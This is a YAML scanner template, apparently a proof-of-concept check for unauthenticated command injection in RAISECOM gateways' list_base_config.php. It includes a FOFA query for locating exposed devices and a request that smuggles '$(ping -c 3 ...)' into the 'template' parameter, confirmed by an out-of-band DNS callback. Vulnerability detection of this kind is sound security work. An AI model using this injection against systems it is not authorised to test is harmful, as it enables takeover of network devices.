id: raisecom-gateway-list-base-config-rce

info:
  name: 瑞斯康达RAISECOM网关设备list_base_config.php远程命令执行漏洞
  author: avic123
  severity: critical
  verified: true
  description: |
    瑞斯康达-多业务智能网关 list_base_config.php 存在远程命令执行漏洞，未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
    FOFA：body="/images/raisecom/back.gif" && title=="Web user login"
  reference:
    - https://cn-sec.com/archives/3012620.html
  tags: raisecom,geteway,rce
  created: 2025/3/28

set:
  oob: oob()
  oobDNS: oob.DNS
rules:
  r0:
    request:
      method: GET
      path: /vpn/list_base_config.php?type=mod&parts=base_config&template=%24(ping%20-c%203%20{{oobDNS}})
    expression: response.status == 200 && oobCheck(oob, oob.ProtocolDNS, 3)
expression: r0()
